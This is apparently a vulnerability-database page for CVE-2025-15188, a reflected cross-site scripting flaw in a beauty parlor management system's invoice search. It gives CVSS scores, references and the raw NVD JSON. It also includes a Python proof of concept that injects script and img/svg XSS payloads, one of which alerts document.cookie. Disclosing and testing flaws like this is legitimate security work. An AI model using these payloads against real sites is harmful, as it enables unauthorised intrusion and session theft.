CVE-2025-15188

Description

A vulnerability was determined in Campcodes Complete Online Beauty Parlor Management System 1.0. This vulnerability affects unknown code of the file /admin/search-invoices.php. Executing a manipulation of the argument searchdata can lead to cross site scripting. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized.

CVSS Details

CVSS Score

2.4

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:campcodes:online_beauty_parlor_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE

Campcodes Complete Online Beauty Parlor Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import urllib.parse

# CVE-2025-15188 PoC - XSS in Campcodes Beauty Parlor Management System
# Target: /admin/search-invoices.php
# Parameter: searchdata

TARGET_URL = "http://target-site.com/admin/search-invoices.php"

def exploit_xss():
    """
    XSS payload injection via searchdata parameter
    This PoC demonstrates how malicious JavaScript can be injected
    """
    # Basic XSS payload to test vulnerability
    xss_payload = "<script>alert('XSS Vulnerability Confirmed')</script>"
    
    # Alternative payloads for bypass
    # xss_payload = "<img src=x onerror=alert(document.cookie)>"
    # xss_payload = "<svg/onload=alert('XSS')>"
    
    # Encode the payload for URL transmission
    encoded_payload = urllib.parse.quote(xss_payload)
    
    # Construct the malicious request
    params = {
        'searchdata': xss_payload
    }
    
    print(f"[*] Sending XSS payload to {TARGET_URL}")
    print(f"[*] Payload: {xss_payload}")
    
    try:
        # Send the request (assumes authenticated session)
        response = requests.get(TARGET_URL, params=params, timeout=10)
        
        # Check if payload appears in response without encoding
        if xss_payload in response.text or '<script>' in response.text:
            print("[+] VULNERABLE: XSS payload reflected without sanitization")
            return True
        else:
            print("[-] NOT VULNERABLE or payload filtered")
            return False
            
    except requests.RequestException as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == "__main__":
    exploit_xss()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15188
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15188
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15188/
[4] VulDB https://vuldb.com/cve/CVE-2025-15188
[5] https://github.com/BUPT2025201/CVE/issues/1
[6] https://vuldb.com/?ctiid.338573
[7] https://vuldb.com/?id.338573
[8] https://vuldb.com/?submit.721868
[9] https://www.campcodes.com/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15188", "sourceIdentifier": "[email protected]", "published": "2025-12-29T13:15:41.537", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in Campcodes Complete Online Beauty Parlor Management System 1.0. This vulnerability affects unknown code of the file /admin/search-invoices.php. Executing a manipulation of the argument searchdata can lead to cross site scripting. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N", "baseScore": 2.4, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:N/I:P/A:N", "baseScore": 3.3, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "LOW", "exploitabilityScore": 6.4, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-94"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:campcodes:online_beauty_parlor_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "D6C611EE-FC14-4E00-94F8-477AFA4BC814"}]}]}], "references": [{"url": "https://github.com/BUPT2025201/CVE/issues/1", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.338573", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.338573", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.721868", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.campcodes.com/", "source": "[email protected]", "tags": ["Product"]}]}}